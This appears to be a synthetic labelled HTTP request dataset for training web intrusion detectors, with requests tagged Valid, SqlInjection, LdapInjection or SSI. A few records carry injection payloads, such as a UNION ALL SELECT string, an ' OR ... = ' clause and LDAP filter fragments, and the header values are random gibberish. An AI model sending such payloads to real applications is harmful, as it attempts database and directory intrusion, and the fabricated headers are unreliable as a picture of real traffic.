ETag: W/"jTbSqdDa@K_hIR0n3"
Expect: 100-continue
From: ruf6nI@0Dnp.be
If-Modified-Since: Fri, 06 Jan 06 01:48:37 UTC
If-Unmodified-Since: Wed, 09 Mar 05 05:01:23 GMT
If-Match: *
If-None-Match: "0L@dTgA3m1zn.Iq"
If-Range: Sat, 04 Jul 09 08:35:46 GMT
Max-Forwards: 2426
MIME-Version: 7.6
Pragma: nmet5i=n
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: Basic ZWN3ZW9vM2k6cndscHR1YWE=
Range: 8-815093
Referer: /3ynHeo/Wdu36a/whtjaot.cgi
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/3.2 (Windows; U; Win 9x 7.3; ac-ds; rv:7.2.7) Gecko/42078095
UA-CPU: x86
UA-Disp: 4451,828,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 537x415
Via: aarO/0.2 88.23.120.185, FTP/5.2 www.gfot.gif, FTP/4.4 43.17.80.222
Transfer-Encoding: identity
Upgrade: miT2r5/5.1
Warning: 753 172.218.58.231 "ldoa" "Wed, 20 Apr 05 05:59:53 UTC"
X-Forwarded-For: 167.169.89.86
X-Serial-Number: 94210
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 314
Start - Id: 9608
class: Valid
GET /mbcs6o.swf?unrgrrraIau6=2355 HTTP/1.1
Host: www.62pey1ne.cz
Connection: eds1iee
Accept: audio/*
Accept-Charset: iso-8859-3, cp-950;q=0.2
Accept-Encoding: compress;q=0.5
Accept-Language: 65x-imritte;q=0.4, a1pshfg-r0eivtim;q=0.3, p-adirein;q=0.3
Cache-Control: min-fresh=06102
Client-ip: 10.102.108.131
Cookie: eaaee5nvovxdn=5713546
Cookie2: $Version="40"
Date: Tue, 09 Aug 05 05:16:50 UTC
ETag: "Z0xxwaW4lTUQ8yUbSmS"
Expect: sleebie=Xf1apd
From: wsedel@fte2.org
If-Modified-Since: Fri, 02 Jan 09 03:35:42 UTC
If-Unmodified-Since: Sun, 27 Feb 05 03:07:18 UTC
If-Match: *
If-None-Match: "5f1wxKGVUovBRRCbAb"
If-Range: *
Max-Forwards: 7
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: iOexxu luao7=rm6admp
Authorization: Digest uri=/iedearde/Winetti/0o2rk/aAfr1u.asmx
Range: 218320-0,0-,8-66598
Referer: /6xy7/i1gnc/hnoea.jpeg
TE: trailers,trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/7.2 (Machintosh; U; PPC Mac OS X 7.2; d0-tq; rv:8.2.2) Gecko/70097035
UA-CPU: StrongARM
UA-Disp: 8659,744,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7520x0183
Via: 0.7 www.sute.gif, 3.7 30.252.219.156
Transfer-Encoding: R3dc
Upgrade: bcr1b/9.3, ol1eo/8.4, etne/3.1, Bs3rt9/5.7, aio/1.0
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 127.233.244.196
X-Serial-Number: 0359869
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9608
Start - Id: 25625
class: Valid
GET /A_F82Teb/BrKCR/rrKgRmnietohet0Onoen/tsAB00/ak_gKbafpIr@/1Ngl7SoAzrblfunshqtu/ltzgdrr.gif? HTTP/1.0
Host: 105.1.120.165:80
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese, euc-jp, cp-950, iso-8859-2;q=0.9, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 86.20.85.20
Cookie: oo=185977496;icstd=pRTqG6uwe;vbscriptupdateI9uaPSnph-0=8157375183;xe8yjrl=ne/ys
Cookie2: $Version="92"
Date: Tue, 30 Nov 04 05:28:50 CET
ETag: "hUNDTa.53Sb7SEZ."
Expect: yEWs=aweeaat;iktCt=giena
From: ma49@uare.ch
If-Modified-Since: Mon, 25 Jul 05 06:59:20 GMT
If-Unmodified-Since: Tue, 24 Jul 07 16:07:33 GMT
If-Match: "YXHxOKjVut.mQ_@1K"
If-None-Match: *
If-Range: "Yj-RCZJ1hwZv.hmFlLn"
Max-Forwards: 8
MIME-Version: 3.4
Pragma: 3ojeg=kq2sat
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Range: -1684
Referer: http://m5aeve.fr/dawmlb/nLhIar/pihosn/tsie/ndduAco.fgf
TE: gzip;q=0.5
Trailer: Max-Forwards
User-Agent: Oy3spuhr (rn-Cphof; tcthrEeQ; dtLNB45PSv; rKV8BiuR4S; b9UUa.qPpi)
UA-CPU: x86
UA-Disp: 8439,526,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0216x076
Via: oha5v/4.2 105.22.67.60, y4o3T/9.2 www.deol.jpeg
Transfer-Encoding: rmmr; oiadr5e=NdnoTnfR
Upgrade: trns/3.6, set/1.1
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 103.157.38.55
X-Serial-Number: 400505966006
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 25625
Start - Id: 42535
class: SqlInjection
GET /aY7QOEig/antqe5htmB/At8eDhwioaz5rrntetog/s6ti/5eaIVrih2m.asmx?ssee=ii7teireerahu&Oept=Hec%5D&merTttsiel4g=9830&tnplwErgoelsone=985&ileOAccffa=nayen+htpasst%2Bi&t2dreleyrcIn=itln&aEdcqscKsI=%27++++UNION+++++++++ALL+++++++SELECT++++sluf++++FROM+++na0nprm+++WHERE+++%27%27++++%3D%27&IN27enet4h=hsaeattsl8rym&hrcnrzlttuesju=tZDTnC&zLi=%25+dRaccess_logrthgtcO&O2evalsb8Ik=695&eauiwrrlAnose=115&idimgx@=618455603 HTTP/1.0
Host: www.rfquiDsT.com
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: ueauA-yaea;q=0.4, rmf-oNfgsu;q=0.2, p-tioHe;q=0.7, o-e;q=0.0, HsshHnea-3HiRa
Cache-Control: max-age=36
Client-ip: 42.162.124.141
Cookie: thtOe8cbtde7et=nAytfdhehtyUnp7;linkNFoK3VYmstyle=5;stnbJ=054312;iieEen5ivgnb=fotmztGzEt;nt=47477;hx1RW0YXjw3B=nBef
Cookie2: $Version="051"
Date: Tue, 22 Jun 04 15:36:47 UTC
ETag: "YaiKF0rmASDK-26T"
Expect: 100-continue
From: bs1as@pton6i0pc.org
If-Modified-Since: Mon, 16 Jan 06 11:56:32 UTC
If-Unmodified-Since: Thu, 19 Jul 07 11:14:36 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 5
MIME-Version: 1.7
Pragma: drde='7e'
Proxy-Authorization: loIn iywehebo=oaejreke
Authorization: Digest qop=eyeeuasn
Range: 79786-446
Referer: http://jnqhsa.ch/xnah/oheOijo/riAneis/nunrieGf/fussxchx.mpg
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: dhUot7tedtfirs
UA-CPU: x86
UA-Disp: 1092,0849,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 0.7 169.218.51.163, 9.8 www.oheait.htm, neIr/3.8 www.iRrws4Ew.jpg
Transfer-Encoding: deflate
Upgrade: e2torm/4.8, rnb/5.6, cpieM/3.1, alfi/8.5
Warning: 080 122.26.58.92 "S5IseRilndhbniaya" "Sat, 05 May 07 24:34:31 UTC"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42535
Start - Id: 20371
class: Valid
GET /lul/t@pyg7zK6hQ_6tp_kss/r6Z8JDx/suDRdxehnh0seyd1tsi/48AsupdateSLBWq8Ci/lserviceslWoncBUHMallM/eaf18hnv2cieutoowmnE/SJrmfKO.VB/sV5HhSJN7i-J/01i3od_lY2n4q.elq/raap.php? HTTP/1.0
Host: 63.180.246.124:924
Connection: keep-alive
Accept: image/*;q=0.3, audio/*;q=0.0
Accept-Charset: iso-8859-8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 154.221.244.163
Cookie: anese0d7m=446;458a0Ujz=]qxaF
Cookie2: $Version="292"
Date: Mon, 11 Feb 08 23:08:40 GMT
ETag: W/"yikpggON5L8XCKhgTO"
Expect: yg4us1u=IoeT
From: ueaw@nsel.fr
If-Modified-Since: Mon, 08 Oct 07 21:53:12 GMT
If-Unmodified-Since: Sun, 18 Dec 05 10:20:18 GMT
If-Match: "R3BAtLctNgxyerZtI"
If-None-Match: "M6kKZku20UEq-9.vzwxj"
If-Range: Sat, 10 Oct 09 23:44:55 UTC
Max-Forwards: 2
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic bzJlZW50ZXA6dHdpYWU=
Authorization: Digest cnonce="idnIcjtd"
Range: -9710,4363-45984
Referer: http://l5ttn.fr/pEnyjHi/ioihdj.sh
TE: trailers
Trailer: From
User-Agent: snoa (kPajKOKW; l.Vk4LzIkq; ro@YI1W-kx; 42vut-2pt; rB9O1Mx)
UA-CPU: Sparc
UA-Disp: 139,156,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 225x040
Via: tlNec/2.4 www.iirsmSe.jpeg, uyin/3.1 33.43.28.31:2, 9.5 102.182.126.157:8513
Transfer-Encoding: gzip
Upgrade: nxt3/7.1
Warning: 768 www.egeqe.js "uqutLw7ebt4c" 
X-Forwarded-For: 240.25.195.20
X-Serial-Number: 11331311370992169456
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20371
Start - Id: 38821
class: LdapInjection
GET /uSD6JuYThXScFQGkvt-J/nteLyoi2/pBP/oVKglF-R/7zTGIVOwp-T/o4NlzPbNO/WHObgsoundj/tTdiitpfeo/PW.html?WqxrtkUf=a9fmser6onexec&BxfHfP_Pgebd=5492941&KWYDwd=64578&pDtwer3s=6498%29%28%26%28objectClass%3Dhgse%29%28%7C%28sn+%3D+I74%29%28cn%3Drnz+++++J*%29%29&gnga=NGo&tteErnoooiArt=5749170&shutdownM0yvbscriptK=rh80e HTTP/1.0
Host: 1.165.108.76
Connection: nih14be
Accept: image/*;q=0.1
Accept-Charset: x-mac-turkish, windows-1252;q=0.9, x-mac-japanese, iso-8859-6;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-stale=19556
Client-ip: 166.96.232.49
Cookie: ouaeh=700;Evdeh=ew
Cookie2: $Version="4"
Date: Sat, 21 Aug 04 07:19:39 UTC
ETag: W/"h37vwYz1lL0OI8Y"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Sat, 21 Oct 06 04:21:44 CET
If-Unmodified-Since: Sat, 15 Dec 07 06:25:36 CET
If-Match: *
If-None-Match: "6yIrmTw1gqsS98sQA"
If-Range: Thu, 25 Jan 07 09:04:49 UTC
Max-Forwards: 388
MIME-Version: 4.6
Pragma: u=sait
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: Digest algorithm=MD5
Range: 55524-
Referer: /gEebehts/xnrmnf/etObisup.jsp
TE: trailers,trailers
Trailer: Via
User-Agent: oNn2ist5tiet4e0esir
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/6.2 www.iAlood.png
Transfer-Encoding: deflate
Upgrade: ctrbt/2.3, eLc/5.5, Tey/4.2, adeltf/5.1
Warning: 659 www.rhdhc.htm "uoftereRIuwgtWj" "Wed, 06 Aug 08 14:08:03 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38821
Start - Id: 18196
class: Valid
GET /e8W_xp4zOxW56B@exG/lG_rezA4@_TG8/nL7ADt6/saQqwOSk6_systemO1/twtnEri/aOYjY./2dx/2a%uLv3fk3/yeq77enllr8lgEsrc.asmx?r7eeap=u0Hwt55&rSms=a8t8d4ga0f&6ietoaore3=tkame1ereums%40&roeItbaSrrisWle=i%7Ea7&rhfoonhperottd=f0hddoAr&rleIWaoyyqdlD=3328031818&ngnKko6oasbcec=7768469&s97sseI0SlT=ty7Ab2Iq1v HTTP/1.1
Host: 107.251.30.206
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-2, x-mac-cyrillic, iso-8859-1, windows-1257
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 133.9.87.178
Cookie: 1e6m=wunlwd;othP8toeci8l=audEp8;oaXen8vd=gg1uLg;eun=6155605;P1H74m05body=aZj3v;m6QshutdownOvanLU=N
Cookie2: $Version="78"
Date: Sat, 30 Apr 05 02:24:53 UTC
ETag: "H5DDMyszPXPK44q@3"
Expect: aaonKjt5=Elnth;oIrtoa0c=y3umpou0
From: T581@xdel.gov
If-Modified-Since: Mon, 10 Apr 06 21:49:08 GMT
If-Unmodified-Since: Tue, 31 Oct 06 05:06:26 UTC
If-Match: *
If-None-Match: *
If-Range: "ub0OlR2EY7A.EpFXa"
Max-Forwards: 2
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic Zkllc3dPOm5BamV1cg==
Authorization: fztohd c3tcp=i5whPe
Range: 666465-916
Referer: /eab1u/cOtSt2s6/eiblnwe/Srcoien.avi
TE: trailers,trailers,trailers
Trailer: Host
User-Agent: Mozilla/7.7 (X11; U; Solaris 9.8; Oc-ai; rv:5.2.5) Gecko/69522586
UA-CPU: StrongARM
UA-Disp: 904,033,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 255x381
Via: 0.6 201.195.193.44, 5.7 www.6ae6Pi6.jpg
Transfer-Encoding: gijy
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 457 249.243.123.227 "ar3gutfzh" "Thu, 05 Jul 07 12:26:34 GMT"
X-Forwarded-For: 138.19.25.37
X-Serial-Number: 93769188235463446017
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18196
Start - Id: 31756
class: Valid
GET /iJ/kvMOm-Ra.N0O4b_/Bmohpa7os/rebodIxlcaVa/sqJ.vZksrkJaJ..mspx?btkfcvadEofs1=0eidcinputhidhpasswdunioncl&tth=gsvadboefm+2aei&efinoT=osrors2L&8Etr5iheAeadlcn=9H&vec=76635 HTTP/1.0
Host: 215.160.217.57:80
Connection: tltaw
Accept: image/*;q=0.1
Accept-Charset: iso-8859-7
Accept-Encoding: 
Accept-Language: eeb-3se, v-nwcru, mcrlehe-8d;q=0.7
Cache-Control: min-fresh=6049
Client-ip: 208.125.245.238
Cookie: HOSh0FDglibD=95
Cookie2: $Version="2"
Date: Thu, 03 Nov 05 15:16:21 UTC
ETag: W/"vlh10JSotRr11jEt"
Expect: 100-continue
From: inOna@gnent8aOHz.be
If-Modified-Since: Wed, 13 Aug 08 16:17:01 UTC
If-Unmodified-Since: Mon, 28 Jun 04 10:29:30 GMT
If-Match: *
If-None-Match: *
If-Range: "zVkhY123ECjk1nLn2QK"
Max-Forwards: 1
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM M2VzNm9jYm4yc3N0NmZYMW91bFNkRWhybHNyZkZzZW5sYWVsSHFhcnNsY3c=
Authorization: Digest qop=orPit
Range: 707434-,-591
Referer: /e7aynem1.doc
TE: trailers
Trailer: If-Range
User-Agent: enLJSzL http://www.iojmseT.gov
UA-CPU: Sparc
UA-Disp: 794,2521,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0437x4847
Via: NUdyts/3.1 174.26.7.196:2
Transfer-Encoding: identity
Upgrade: Nesagu/1.4
Warning: 198 227.83.143.66 "ntior4dtoetty" "Sun, 24 Sep 06 10:26:52 UTC"
X-Forwarded-For: 78.110.85.184
X-Serial-Number: 48619214669
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31756
Start - Id: 41368
class: SqlInjection
PUT /aqsbtshhriebuq.gif? HTTP/1.1
Content-Length: 137
Content-Language: hpdahgua,Ie,vatas6
Content-Encoding: deflate
Content-Location: /njarmE3t.swf
Content-MD5: YXFrcm90dGdpSHN0dDhwSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Aug 07 11:55:04 UTC
Last-Modified: Fri, 12 Oct 07 19:50:02 UTC
Host: www.icittjemkz.biz
Connection: otbeeats
Accept: text/html
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: osXtsE-ylqh2i;q=0.8, i6krdrYc-la, oacztD-oTieZ;q=0.5, rloim-hisoal, eebijlo-esys
Cache-Control: max-age=12
Client-ip: 200.4.215.226
Cookie: taoEtyeEs5=1417;o2doezeAxhEe=systemn;ttzautzoaaa=985949;lSwaosasp1alnso=odeuIlnrtwZ;rivRygx6=6BEX
Cookie2: $Version="234"
Date: Mon, 07 May 07 05:18:19 UTC
ETag: "ZZiZLREEUVASn-Gfemy7"
Expect: 100-continue
From: wvycy@8isLoesg.de
If-Modified-Since: Sun, 05 Sep 04 23:00:03 CET
If-Unmodified-Since: Thu, 26 Feb 09 02:11:47 UTC
If-Match: "XOCmiS@TrfXEQKC8@p"
If-None-Match: *
If-Range: Wed, 24 Jun 09 16:08:24 GMT
Max-Forwards: 22
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: Digest algorithm=o3su
Range: 4608-978400,71-,119649-
Referer: /tynzRliA.txt
TE: deflate,trailers,chunked
Trailer: Connection
User-Agent: Mozilla/8.3 (Windows; U; Windows NT 4.3; SK-ss; rv:3.0.2) Gecko/12712842
UA-Disp: 320,3937,32
UA-OS: Windows 98
UA-Color: color32
Via: HTTP/5.9 172.53.5.70:134
Transfer-Encoding: identity
Upgrade: nhetgd/3.9
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Serial-Number: 102930294622
----: ------------------------------------

a3=to0uCRb5e&pcseiabongzne=[<sj$-]ery]&eaP=' OR  'pot'  = N' &oa0nkutaeeAtilr=62&snpyroeo9rhp=9136&a0hmthnappa=mlcl0r

End - Id: 41368
Start - Id: 2855
class: Valid
GET /gUiniinEzattodemv/P-mr.dll? HTTP/1.0
Host: www.npetasmv9d.net:2
Connection: keep-alive
Accept: video/quicktime;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: f0=fanGat8q
Client-ip: 255.137.98.72
Cookie: tZ3ie3wd=dq@yf-agN
Cookie2: $Version="975"
Date: Sun, 27 Jan 08 11:06:39 UTC
ETag: "NjhsqOtV49g9a9O"
Expect: lnss
From: ontooib@ikmeqssL5.gov
If-Modified-Since: Fri, 09 May 08 15:13:02 GMT
If-Unmodified-Since: Mon, 14 Sep 09 21:51:54 UTC
If-Match: "yokQyT44r0@DWXORCjY"
If-None-Match: *
If-Range: Tue, 23 Sep 08 11:57:18 GMT
Max-Forwards: 6050
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic bmFtYWg6NXMyYXY=
Authorization: Basic c3JpZ2FlSWU6ZTg4ZnloYg==
Range: 839-599
Referer: http://ebosa8.fr/upsloi/otaTpar.exe
TE: gzip
Trailer: TE
User-Agent: Mozilla/0.1 (compatible; MSIE 8.4; Open BSD i586; pyi4h; AuPetyx6a)
UA-CPU: Sparc
UA-Disp: 9780,426,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0527x960
Via: 3.7 www.cbnamct.tiff, O9teot/8.9 www.1Raee.css:4734
Transfer-Encoding: compress
Upgrade: dp5e/7.1, 6Wocs/8.4, sytonn/2.0, a4edeH/0.9
Warning: 820 www.ihNeie.html "srgeAedfihnrsmewv" 
X-Forwarded-For: 205.119.197.218
X-Serial-Number: 674535146316
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2855
Start - Id: 5844
class: Valid
PUT /inA_S9DhRE-lpbz_0.v/Vncmdeh/q1rtiuw/aroaeb9odtgteSFw/8pSvHe67OzwpCa75G.htm? HTTP/1.0
Content-Length: 40
Content-Language: h5z
Content-Encoding: gzip
Content-Location: http://eBlgcct.uk/r2ury.png
Content-MD5: ZXdubHZhc3Nscm5zOWt1SA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Feb 06 11:54:09 GMT
Last-Modified: Wed, 18 Feb 04 19:10:03 GMT
Host: www.sSisSuingo.biz
Connection: oadno7n
Accept: video/*, text/html, application/*
Accept-Charset: *
Accept-Encoding: compress;q=0.6, identity, gzip;q=0.7, compress
Accept-Language: aeaeE-nc6ed, siIbbyab-aoht;q=0.3, p-rsox8n5, rto-e
Cache-Control: max-age=36
Client-ip: 127.171.94.127
Cookie: bn6ienah=951965;ul9lnyqnemelact=82405;8Y8Mwindow.open9Pusb5=8;xBwloginullYUFaeO=6ci6ns;te9rb5rdAyasgs=ueoDjrx1rte>d?S;7oSe_=logdsa9"ni'tcnes0 S
Cookie2: $Version="823"
Date: Tue, 10 Feb 04 22:04:38 CET
ETag: "qmXQBd.NubnFTaM2_"
Expect: ahrut5sh=ahsanhca;l4v5A
From: sePnirh@e4qne.de
If-Modified-Since: Sun, 09 Jan 05 21:18:43 CET
If-Unmodified-Since: Tue, 18 Apr 06 21:47:01 GMT
If-Match: "zA3.IMGCfwt@xc7X"
If-None-Match: *
If-Range: "xOK2MTw06tZV3Be"
Max-Forwards: 63
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic czFwdHRkczplY3ZpZQ==
Range: 7412-
Referer: /aglibDt.sh
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: aNsvFF http://www.EJar.org
UA-CPU: 68000
UA-Disp: 746,1087,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3215x099
Via: atqha/7.1 147.5.192.146:8616, HTTP/5.6 180.13.29.76, tnmsa/6.8 www.4UeoUwty.js
Transfer-Encoding: deflate
Upgrade: e4c/1.1, hhpf/8.4, n1mot/3.4, n6dla/3.5
Warning: 161 210.131.126.108 "bzrjUioaiertes" "Tue, 24 Jun 08 01:01:36 GMT"
X-Forwarded-For: 10.142.82.192
X-Serial-Number: 8692230651
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1nsarobikcrhp=uime&7rixNr=ot&3aLotten=52

End - Id: 5844
Start - Id: 5190
class: Valid
POST /SVCIWexecG86S/mOrmageada/tGR8yAo_P9V9xxjLvrFh/r3ztyet/nr64.php? HTTP/1.0
Content-Length: 64
Content-Language: roxprt4,SgmnUm,ciElaz4
Content-Encoding: gzip
Content-Location: /ei0r5err/aeem3e/rumcueer.shtml
Content-MD5: NW95ZVJ0RGFlZFRJYW5lbA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Aug 08 11:01:35 GMT
Last-Modified: Thu, 15 Feb 07 05:34:42 UTC
Host: www.hEfce.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh;q=0.5, cp-936;q=0.1, isiri-3342, iso-8859-1;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: max-age=9
Client-ip: 81.147.169.139
Cookie: i6nullhrIKjr06g=b
Cookie2: $Version="250"
Date: Sat, 08 Apr 06 09:53:38 CET
ETag: W/"rLV7rPzIFtVMdQmWNN0"
Expect: 100-continue
From: poNh5pmt@ler5Ht.st
If-Modified-Since: Tue, 13 Jun 06 18:06:02 CET
If-Unmodified-Since: Sun, 14 Dec 08 23:34:21 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Jun 07 19:02:43 UTC
Max-Forwards: 80
MIME-Version: 7.8
Pragma: g='wne'
Proxy-Authorization: Basic dHR5YUh0NzpmdG1uaQ==
Authorization: Digest realm
Range: -71
Referer: /rdoew/uelhxei5/ytusgYjo.dll
TE: trailers
Trailer: Host
User-Agent: ooAZI@0X http://www.4iud.st
UA-CPU: MIPS
UA-Disp: 5363,7210,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4221x6356
Via: nYoxn/0.2 178.123.177.203, 5.8 234.87.86.216, 7.8 www.sLjbesI.shtml
Transfer-Encoding: compress
Upgrade: cpuy/9.4, tco/4.5, 15iM1/7.2
Warning: 727 127.71.143.79 "ewtqvhlrieol" 
X-Forwarded-For: 221.88.76.116
X-Serial-Number: 083639126
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

ghtseIpaez1ecsl=d3Z4ux-Sbz7&yeeF8li=irhsds3e2ooapqlR&Oalcr=aIlpu

End - Id: 5190
Start - Id: 26856
class: Valid
GET /aht1a05ca/iJqzxao.png? HTTP/1.0
Host: 122.211.145.186:80
Connection: eoaooha
Accept: text/xml;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: nasgured-heBi38zh;q=0.0
Cache-Control: max-age=6222
Client-ip: 24.60.131.148
Cookie: iuc=rE
Cookie2: $Version="91"
Date: Thu, 25 Dec 08 05:50:45 GMT
ETag: W/"pwygvxgH9dhSTlIzhxnl"
Expect: narnunp=svtEad
From: vteseoi@repl.biz
If-Modified-Since: Sun, 27 Dec 09 12:01:16 GMT
If-Unmodified-Since: Mon, 20 Nov 06 16:17:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 381
MIME-Version: 8.4
Pragma: l=o4
Proxy-Authorization: nmede xeerdo=aetP
Authorization: Digest realm
Range: -6214
Referer: /ttteaf/6esoE/aeegmup.exe
TE: deflate,deflate,chunked
Trailer: Pragma
User-Agent: stehsth (dtN6Wz3E; r5zTcbAn; usE8BL; uVmFpS; n3OdZ7)
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9604x4951
Via: 7.5 www.ume9eeoL.js:385, 4.2 212.65.142.44, 9.2 www.hNadwEub.shtml:66
Transfer-Encoding: heail; nsbemrgk=awa1
Upgrade: tlets/6.9, Inu/8.7, zfnnt7/5.8
Warning: 936 www.sdeox.html "ieitess8sehaqekHrEgo" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 162095
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26856
Start - Id: 37346
class: LdapInjection
GET /nlsaome8pehiMgdtat/rVhiL0DB9sdYDBOTOV/winntQhCQstyleZZVmechoqUKz/lfeiara3/9BqSpAuBjQg@V/cnowflce8aoanresy/hiNJv.dBjrH1QM.mspx?60iEe=waagjs&hjzNmst=64775960&eo8hbts93olys9o=15180&uwvNSG=window.openiDininputeghe+%5DnrznTt&odrN1thgszt1=8757262310&ZGtkQuSx_y=%3E+&aotn7zinacnw=mMsR59&nhyo=6880015&catjyPglHlocationON=arHt%2BtRqsd%24a2%2Fdudcta&6ae=%3Dolink&t1aumekst=76&cszf6e4onetcat19having=copyienyaa&sqi=+in%3A&eTliassme=loeenhju3libto&uaritgse=uher HTTP/1.0
Host: 123.4.192.57
Connection: 9art
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: )   (   |(displayName=had*)(name   = had*  )(  mail=had*    )
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 57.5.226.35
Cookie: ddtedmjkahas=147;cg1etEiTl=596594;eyeh=es+mocha
Cookie2: $Version="12"
Date: Tue, 14 Jul 09 14:31:38 CET
ETag: W/"jek.LKiVan3LxCi7px"
Expect: tweTge
From: elbo@eieuetfntT.fr
If-Modified-Since: Tue, 05 Aug 08 04:04:38 CET
If-Unmodified-Since: Tue, 02 Nov 04 14:04:13 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 7.2
Pragma: ex4kieet=5
Proxy-Authorization: Basic UG1sczU6eXJoaHVGbA==
Authorization: e8tRrn fas9aho=iey9e
Range: -04795,-66
Referer: /emmsst.jpg
TE: gzip,trailers
Trailer: Range
User-Agent: Mozilla/6.4 (X11; U; Linux i586 5.7; rh-et; rv:2.4.5) Gecko/27095576
UA-CPU: x86
UA-Disp: 654,6538,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 495x1616
Via: HTTP/4.7 www.rlhaes.tiff, aidr/6.7 www.qonp.html, HTTP/1.2 175.58.106.134
Transfer-Encoding: identity
Upgrade: nHa/4.2
Warning: 830 www.ane2.html:1 "vjdynls" "Sun, 23 Nov 08 23:13:16 CET"
X-Forwarded-For: 87.44.238.73
X-Serial-Number: 27736469943360301
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37346
Start - Id: 40529
class: SSI
